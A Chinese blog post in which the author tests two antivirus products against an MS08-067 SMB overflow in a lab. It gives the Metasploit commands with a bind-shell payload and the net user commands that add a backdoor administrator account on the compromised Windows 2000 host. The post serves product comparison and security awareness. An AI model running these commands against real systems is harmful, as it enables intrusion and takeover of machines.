计算机软件漏洞防御方法,溢出(漏洞)***的实现及防御

最新推荐文章于 2024-03-10 15:11:08 发布
最新推荐文章于 2024-03-10 15:11:08 发布
阅读量402 收藏
点赞数
文章标签: 计算机软件漏洞防御方法

前言

媒体上关于系统漏洞的话题一直不断,在我所接触的用一些朋友和用户中虽然也知道打系统补丁很重要,但却又一直不以为然总以为网络上的危险离自己很远,大部份人都认为进行一次远程***很困难甚至认为只要安装了防病毒软件就一切大吉,是不是这样呢?让我们看看今天的操作。

主动防御技术通过微点推出后给现在的安全界注入了一针兴奋剂,现在各大厂商都宣传自己有了主动防御技术,而网络上针对它的宣传也是毁誉参半。 一切都以事实为主,有图有真相。

9b56097512d9d7c9f322b45d75892586.png

测试环境

Metasploit

操作系统:CentOS5

软件版本:framework-3.5.0-linux-i686.run

IP 地址:192.168.0.10

389cb77894a56934c535d2da01df5169.png

Metasploit(http://www.metasploit.com/framework/download/)是一款开源的安全漏洞检测工具。由于Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF)是2003 年以开放源代码方式发布、可自由获取的开发框架,这个环境为***测试、shellcode 编写和漏洞研究提供了一个可靠的平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,最新版本的MSF 包含了180多种当前流行的操作系统和应用软件的exploit,以及100多 个shellcode。作为安全工具,它在安全检测中起到不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供有力的保障。

微点主动防御软件

操作系统:Windows 2000 SP2

微点版本:2010-12-09

IP 地址:192.168.0.200

c101005f5b43e4f48dc269d4d7039e66.png

9aec6158291c7cbcbd820fd14e69d8e4.png

NOD32环境

操作系统:Windows 2000 SP2

软件版本:2010-12-09

IP 地址:192.168.0.100

ae4114cc764923405739f70e54326a37.png

3db8af4111589f12066846ef79f01c95.png

操作步骤

搭建测试环境

按简介中的说明搭建相应的测试环境,保证三台机器都能相互通讯,有关实验环境的搭建方法可以参考利用单主机搭建和物理机器通讯的测试网络这篇文章。有关Metaspolit的安装方法网络上有很多,其方法也不复杂。

查看本地用户

在安装了微点主动防御软件的计算机上打开“用户管理”查看本地的所有用户。

2b4d4be6008497d560b07b490e8e0f15.png

对微点进行溢出***

登录到安装了Metasploit的系统,同时运行以下的命令启动到Metasploit程序,同时设定调用的溢出漏洞为MS08-067,远程主机为192.168.0.200,本地联接端口为5555,如下图所示。

msfconsole

use exploit/windows/smb/ms08_067_netapi

setPAYLOAD windows/shell/bind_tcp

setRHOST 192.168.0.200

setLPORT 5555

exploit

a04922fdfd655d0c4617f62c6aca4f6d.png

ece78dca11de8751e5ce3bdd02b7ab2a.png

1b698471bb3218b89365b00e854122e2.png

查看***结果(微点)

输入上述指令后,本地Metasploit会提示溢出结束但未能取得会话权限,而此时微点已检测到溢出***,同时还给出了远程***者的IP地址,证明安装微点主动防御软件后能有效防止溢出***。具体如下图所示。

07277b195687ae0ac99d95f5431a1e4c.png

5cfd419a50d62fc935c637dbe645496d.png

对NOD32进行溢出***

登入Metasploit重新设定远程***的主机地址,因开始已指定了具体的溢出漏洞,这里只需要重新设定远程主机地址就可以了。具体指令及截图如下所示。

unset RHOST

setRHOST 192.168.0.100

show options

exploit

d6bcc4117126991e0b7a05b2607b7a91.png

查看***结果(NOD32)

在输入上述指令后会提示已获取远程主机的管理权限,此时在远程管理会话中输入相关指令在计算机中新增用户并赋予其管理员权限,具体指令及截图如下所示。

netusertest 123 /add

net localgroup administrators test /add

c6f246db9476589999741809462d62b2.png

87fc1db8c325a8680013f459d68135bb.png

测试远程添加的用户

为了检测溢出***的作用,打开“用户管理”界面时会发现已新增test用户,同时可以使用该用户登陆系统且拥有管理员权限,如下图所示。

6d4426720a0aef83e30eff2394a60de2.png

5fba69f8964d0ac89bce5a98d5765753.png

后记

从上面的测试可以得知微点所宣传的防止溢出(漏洞)***确实是有效的。以下是关于该功能的描述。

“本发明涉及计算机缓冲区溢出***的检测方法,即,通过建立勾挂函数,检查线程所建立的堆栈帧的返回地址,并根据该返回地址判断是否发生缓冲区溢出,并在发现缓冲区溢出后,将引起该缓冲区溢出的线程结束。利用本发明的缓冲区溢出***的检测方法,不但可以高效、准确的检查出恶意程序的缓冲区溢出***,而且避免了现有技术中的杀毒软件对新生病毒特征代码获取的滞后性,和防火墙系统使用时的繁琐以及给计算机知识很少的用户带来的麻烦。即使对于新生的缓冲区溢出***的病毒、***也可以准确、高效的进行拦截。”

“申请(专利)号:200510007681.5”

声明

本文的目的绝不是为那些怀有不良动机的人提供支持,也不承担因为技术被滥用所产生的连带责任;本文的目的在到最在限度地唤起大家的网络安全意识,正视我们的网络世界所面临的一声危机,并采取行动。

理性批判
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
溢出漏洞分析
NiShoushun的博客
04-11 582
溢出漏洞 前言:自己刚开始看这一块,加上自己的C语言基础并不好,很多地方都是参考的其他文章,所以可能会有很多错误的地方 文章目录溢出漏洞1.基于C语言的缓冲区溢出漏洞分析1.1 缓冲区溢出漏洞介绍1.1.1 缓冲区溢出漏洞1.1.1 漏洞产生背景1.2 C语言中内存的划分1.2.1 内存划分1.2.2 进行内存划分的意义2 溢出漏洞2.1 栈溢出漏洞2.1.1 栈溢出漏洞2.1.2 栈帧 st...
溢出漏洞)***的实现防御
weixin_34414196的博客
12-15 140
前言   媒体上关于系统漏洞的话题一直不断,在我所接触的用一些朋友和用户中虽然也知道打系统补丁很重要,但却又一直不以为然总以为网络上的危险离自己很远,大部份人都认为进行一次远程***很困难甚至认为只要安装了防病毒软件就一切大吉,是不是这样呢?让我们看看今天的操作。   主动防御技术通过微点推出后给现在的安全界注入了一针兴奋剂,现在各大厂商都宣传自己有了主动防御技术,而网络上针对它的宣传也是毁誉...
可怕的程序溢出
孤剑之家
08-18 2868
一般的溢出方法过程为:1.确定定位返回店;2.ShellCode编写;3.jmp esp的地址。嘿嘿!感谢lion大哥提供的公用地址0x7ffa4512 (向lion致敬);一个非常简单的测试程序,看看这个程序。Buffer Overflow:#include #include char name[]="abcdefghi";main(){  char output[8
溢出漏洞攻击原理与防护方法
ljc_zy的专栏
06-22 1246
       溢出漏洞攻击是非常重要的黑客攻击手段,因此了解溢出漏洞攻击的原理和防范方法是非常有必要的。以下内容为网上相关文章的整理,仅为学习。       缓冲区溢出攻击原理    缓冲区溢出攻击向程序的缓冲区写入超出其长度的内容,造成缓冲区的溢出,从而破坏程序的栈,使程序转而执行其他的指令,以达到攻击的目的。    防护方法         1)书写安全的代码,避免出现可
软件漏洞发觉与防范的学习(二)
lcygloria的专栏
04-14 1051
接着上篇软件漏洞分类接着写。   2.整数溢出漏洞 这个相对比较容易理解。整数是一种数据类型,对于32位有符号整数,最大值是0x7fffffff,即十进制2147483647,最小值是-0x80000000,十进制-2147483648。当赋值给一个整数的值为其最大值时,再加1,就会发生整型溢出。对于有符号数,这会导致一个逻辑错误,绕过安全限制。而且也可能导致溢出漏洞。   3.格式化字
软件漏洞与缓冲区溢出奚PPT优秀资料.ppt
11-14
攻击者利用溢出漏洞将Shellcode放入内存,并改变控制流程以执行它,从而获取系统控制权。 **六、系统漏洞的一般防范** - **更新补丁**:定期更新操作系统和应用程序以修复已知漏洞。 - **关闭不必要的服务**:减少...
Linux内核漏洞检测与防御2022看雪安全开发者峰会(公
11-19
这份文档可能涵盖了从理论基础到实战技巧的各种内容,包括但不限于漏洞的分类、检测方法、利用手段、防御策略以及最新的研究成果。 【标签】"Linux内核漏洞检测与防御20"突出了这个话题的关键点,即针对20年代的...
软件安全漏洞检测优质资料.doc
12-02
未来,软件安全漏洞分析技术的发展将更加注重预防和预测,通过深度学习和人工智能等先进技术,实现对未知威胁的快速响应和智能防御。同时,加强软件开发生命周期中的安全性,强化安全编码规范,以及提升用户的安全...
缓冲区溢出漏洞实验报告(附带程序源码和被攻击程序)
04-18
1.局部变量与栈的关系 2.利用溢出运行攻击代码 3.缓冲区溢出演示 ... 有一点 x32dbg逆向工具的基础就可以,win10系统的防护比较高,最后的被攻击程序如果运行不了的话,建议在x32调试软件中运行。
软件漏洞发觉与防范的学习(一)缓冲区溢出漏洞
lcygloria的专栏
04-13 1222
安全很重要,从今天开始学习,愿与大家分享! 软件安全漏洞 软件的bug被利用来对用户造成恶意攻击,如给用户计算机安装木马,或直接盗取用户计算机上的秘密信息等。这时候就可以称之为软件的安全漏洞。   软件漏洞分类 1缓冲区溢出漏洞 最容易发生,原理是由于软件在处理用户数据时使用了不限边界的拷贝,导致程序内部的关键数据被覆盖,引发的安全问题。 缓冲区指的是OS中用来保存临时数据的空间,一
软件漏洞篇(下)
m0_57929980的博客
06-15 604
软件漏洞篇:介绍格式化字符串漏洞、整数溢出漏洞、攻击C++虚函数、其他类型漏洞(注入类、权限类)
学习打卡4:漏洞的利用技术与技巧与风水学习
一点涵的博客
09-10 1955
督促自己:2020-9-10 学习记录: 《逆向工程权威指南》上 ARM64 ARM64的CPU中可能运行于ARM模式,不可能运行于 Thmub 或者 Thmub-2 moshi ,所以它必须使用32位指令。 STP(Store Pair) 指令是把寄存器的值存储到内存中的任意地址,明确是sp寄存器时,是存储在栈中。 感叹号标志意味着其标注的运算会被优先执行。(这属于“预索引/pre-index”指令,对应“延迟索引/post-index”指令) 在ARM64中,X29寄存器时帧指针,X30起着LR的作用
计算机缓冲器原理,缓冲区溢出攻击原理-信息安全工程师知识点
weixin_35751412的博客
07-15 730
信息安全工程师知识点:缓冲区溢出攻击原理缓冲区是计算机内存中的一个连续块,保存了给定类型的数据。当进行大量动态内存分配而又管理不当时,就会出现问题。动态变量所需要的缓冲区,是在程序运行时才进行分配的。如果程序在动态分配的缓冲区中放入超长的数据,它就会溢出。打个比方,缓冲区溢出好比是将十磅的糖放进一个只能装五磅的容器里。一旦该容器放满了,余下的部分就溢出。程序设计者编写的程序代码,如果没有对目的区域...
软件漏洞溢出
最新发布
smallfish10086的博客
03-10 152
首先我们需要清楚,栈底是ebp高地址,栈顶是esp低地址,而存储一般由低地址向高地址。综上esp是栈的顶,由他来开辟空间,但他是存储的底,由他向高地址存储。当调用一个函数时,会进行esp-的操作,来开辟新的栈提供内存。ebp是栈的底,由他来结束空间,但他是存储的顶。
[转]“司令”的缓冲区溢出心得
ToBeroOTer的专栏
03-02 1444
一、 缓冲区溢出的发展简史1、 基础知识(1) 汇编语言(2) 反汇编原理及Intel机器指令编码体系(3) 调试器原理(4) 异常处理(SEH)(5) 调试技术(6) Windows API 开发2、 软件漏洞分类逻辑漏洞:如条件竟争。编码漏洞:如缓冲区溢出漏洞,格式化字符串漏洞等3、 缓冲区溢出漏洞利用历史在国外,早在80年代初就有人开始讨论溢出攻击。1989年,Spafford提交了一份关于
软件漏洞及缓冲区溢出
孤独是因为思念谁
01-09 1344
文章作者:davy_yan[E.S.T]信息来源:邪恶八进制 中国 http://www.eviloctal.com/forum/本文是我做溢出的一点心得,希望大家提出宝贵的修改意见,也希望对大家有一定的帮助:)软件漏洞及缓冲区溢出一、 缓冲区溢出的发展简史1、 基础知识(1) 汇编语言(2) 反汇编原理及Intel机器指令编码体系(3) 调试器原理(4) 异常处理(SEH)(5) 调试技术(6)
浅谈中间件漏洞防护
Fly_鹏程万里
06-23 5501
中间件漏洞可以说是最容易被web管理员忽视的漏洞,原因很简单,因为这并不是应用程序代码上存在的漏洞,而是属于一种应用部署环境的配置不当或者使用不当造成的。那么从实际情况来看,预防这种漏洞最大的难点,在于中间件安全该由谁负责?    我们在处理应急响应事件时经常遇到这么一种情况,客户网站代码是外包的,也就是第三方公司负责开发,而部署可能是由客户内部运维人员负责。暂不说他们对于中间件安全的重视程度与了...
二进制漏洞挖掘:栈溢出漏洞原理与ASLR防御
二进制漏洞挖掘-栈溢出-开启NX开启ASLR 本文将详细介绍二进制漏洞挖掘中的栈溢出漏洞,特别是开启NX和ASLR的影响。...通过本文,可以了解栈溢出漏洞的危害性和防御方法,提高自己的安全防御能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值